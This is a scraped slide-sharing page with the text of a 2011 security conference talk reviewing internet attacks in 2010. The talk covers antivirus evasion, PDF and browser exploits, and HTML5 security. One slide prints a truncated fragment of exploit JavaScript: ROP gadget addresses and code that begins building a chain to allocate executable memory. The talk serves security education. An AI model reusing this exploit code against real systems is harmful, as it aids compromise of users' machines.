2010 A Net Odyssey

43 %
57 %
Information about 2010 A Net Odyssey

Published on February 26, 2011

Author: saumilshah

Source: slideshare.net


This talk looks back at 2010 - a very imporant year in the area of Internet Security.

2010: A Net Odyssey Saumil Shah nullCON Goa 26.02.2011

Welcome to NullCON! nullcon.net | null.co.in

# who am i Saumil Shah - CEO Net-Square saumilshah हैकर હેકર Hacker भाषा अनेक लक्ष्य एक

What did we learn from ?

ATTACK SURFACE 2010-2011 5

5 33% MORE!

5 With JIT!Fights DEP, ASLR!

5 Worldwide coverage, Hides your tracks.

5 ...as never seen before!

5 GUARANTEED!! Fresh new bugs, Present on most computers

"The amount of intelligence in the world is constant. And the population is increasing."


Jedi A/V Tricks These are not the sploitz you're looking for.

Obfuscated Javascript decoded without using eval, document.write, etc. See no eval! Acrobat CoolType exploit IE+JNLP exploit

High Tech vs. Low Tech Acrobat CoolType exploit Return Oriented Programming code Escape-From-PDF No fancy tricks

This iz what ?

I'm an evil Javascript I'm an innocent image

function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addressof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval="" <CANVAS>

W3C "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]

Application Delivery Authentication Statefulness Data Typing Non-mutable

Application Delivery The Web at present Authentication Statefulness Data Typing Non-mutable HTTP HTML AJAX Flash Sandbox HTML5 Anti-XSS WAF Silverlight Web sockets


No longer Science Fiction

Keep onpatching!

I can haz sandbox I Also Can!

The Solution? HTML 8.0 HTTP 2.0 Browser Security Model Self Contained Apps

n|u dwitiya kthxbai saumil@net-square.com slideshare.net/saumilshah www.net-square.com

Add a comment

Related presentations

Presentación que realice en el Evento Nacional de Gobierno Abierto, realizado los ...

In this presentation we will describe our experience developing with a highly dyna...

Presentation to the LITA Forum 7th November 2014 Albuquerque, NM

Un recorrido por los cambios que nos generará el wearabletech en el futuro

Um paralelo entre as novidades & mercado em Wearable Computing e Tecnologias Assis...

Microsoft finally joins the smartwatch and fitness tracker game by introducing the...

Related pages

2010 (1984) - IMDb

2010 . PG | 1h 56min | Mystery, Sci-Fi, Thriller | 7 December 1984 (USA) A joint U.S.-Soviet ... Friday Face-Off: 2001: A Space Odyssey vs Interstellar;
Read more

2010 (film) - Wikipedia, the free encyclopedia

2010 (also known as 2010: The Year We Make Contact) is a 1984 American science fiction film written and directed by Peter Hyams. It is a sequel to Stanley ...
Read more

2010: Odyssey Two (Space Odyssey, #2) by Arthur C. Clarke ...

Kye Weber "Sentinel" is not so much a sequel to 2010: A Space Odyssey" as prior work by the author. Witch was used as foundation material for the first ...
Read more

Honda Odyssey 2010 à vendre | autoHEBDO.net

Vous souhaitez acheter un Honda Odyssey 2010? Visitez autoHEBDO.net: la plus vaste sélection de Honda Odyssey neufs et d'occasion au Canada.
Read more

OEM 2010 Honda Odyssey Replacement Parts ...

OEM 2010 Honda Odyssey Parts at Wholesale Prices - Find Genuine Factory Replacement Odyssey Parts Online Now, or Call 888-732-1568.
Read more

Honda Odyssey Manual 2010

Get Instant Access to PDF Read Books Honda Odyssey Manual 2010 at our eBook Document Library 1/11 Honda Odyssey Manual 2010 Honda Odyssey Manual 2010 PDF
Read more

2010 Odyssey Service Manual

Get Instant Access to PDF Read Books 2010 Odyssey Service Manual at our eBook Document Library 1/11 2010 Odyssey Service Manual 2010 Odyssey Service Manual PDF
Read more

Used 2010 Honda Odyssey Minivan Pricing & Features | Edmunds

Used 2010 Honda Odyssey Minivan (69) Edmunds Review MPG We didn't find any results. You can try changing your zip code, or check another model ...
Read more

2010 Odyssey Service Manual

1/12 2010 Odyssey Service Manual 2010 ODYSSEY SERVICE MANUAL PDF If you want to have a destination search and find the appropriate manuals for ...
Read more